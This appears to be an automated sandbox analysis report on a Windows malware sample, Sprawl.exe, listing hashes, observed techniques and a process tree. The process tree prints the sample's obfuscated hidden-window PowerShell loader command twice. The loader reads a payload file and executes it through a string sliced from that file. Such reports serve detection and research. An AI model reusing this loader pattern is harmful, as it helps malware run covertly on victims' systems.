Analysis
- max time kernel: 118s
- max time network: 124s
- platform: windows7_x64
- resource: win7-20241010-en
- resource tags: arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
- submitted: 22-10-2024 14:03
Static task: static1
Behavioral task: behavioral1
  Sample: Sprawl.exe
  Resource: win7-20241010-en
Behavioral task: behavioral2
  Sample: Sprawl.exe
  Resource: win10v2004-20241007-en
Behavioral task: behavioral3
  Sample: Paraffinerer.ps1
  Resource: win7-20241010-en
Behavioral task: behavioral4
  Sample: Paraffinerer.ps1
  Resource: win10v2004-20241007-en
General
- Target: Sprawl.exe
- Size: 859KB
- MD5: 47fd98348b7d314e4e9dae46e5f1e1a1
- SHA1: cafe48404707e61235bfbe6646d8072af4298e21
- SHA256: 125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1
- SHA512: 8a1deda7d7e8e80d8b2e62ad0d9d4400b1d865ea322955e577fc439a8a0f1d6d3cb912397ecb6458941fd7fd566c1fdbdf4c4ed02c72234fa543bfcb45db845a
- SSDEEP: 12288:l9/IyjazmRR+BZhOLlpJjdCPwwdw6ETeVlCE7vkQymGwSW01hXqvjoaCi7lnsZzz:/A/KqZhOnJdyzp+alCJmvulW6Nd0vo
Malware Config
Signatures
- Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)
  Run PowerShell and hide display window.
  Processes:
    pid   process
    2932  powershell.exe
    3064  powershell.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTPs, 3 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Processes:
    description   ioc                                                          process
    Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
    Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  Sprawl.exe
    Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes:
    pid   process
    2932  powershell.exe
    3064  powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes:
    description               pid   process
    Token: SeDebugPrivilege   2932  powershell.exe
    Token: SeDebugPrivilege   3064  powershell.exe
- Suspicious use of WriteProcessMemory (8 IoCs)
  Processes:
    description                        pid   process     target process
    PID 2868 wrote to memory of 2932   2868  Sprawl.exe  powershell.exe
    PID 2868 wrote to memory of 2932   2868  Sprawl.exe  powershell.exe
    PID 2868 wrote to memory of 2932   2868  Sprawl.exe  powershell.exe
    PID 2868 wrote to memory of 2932   2868  Sprawl.exe  powershell.exe
    PID 2868 wrote to memory of 3064   2868  Sprawl.exe  powershell.exe
    PID 2868 wrote to memory of 3064   2868  Sprawl.exe  powershell.exe
    PID 2868 wrote to memory of 3064   2868  Sprawl.exe  powershell.exe
    PID 2868 wrote to memory of 3064   2868  Sprawl.exe  powershell.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\Sprawl.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Sprawl.exe"
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID: 2868
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 2932
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 3064
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Filesize: 7KB
  MD5: c786fdc8d6b86c034144cb0426006ed0
  SHA1: 3dd58853ae13bd815aab6345f594b9d195b94aec
  SHA256: e8d5e62ebac31c0e075babafd2db24d407139eb3edb2da515f214a0e690d6b68
  SHA512: ae403bc3408a8ed4feeaa1c9a26c455519ae50c88acde47eab20f6ad959a09e485dce915d731abadb5b5f0a96e315fcb9082dac73d5a99037953cf11882b9ba9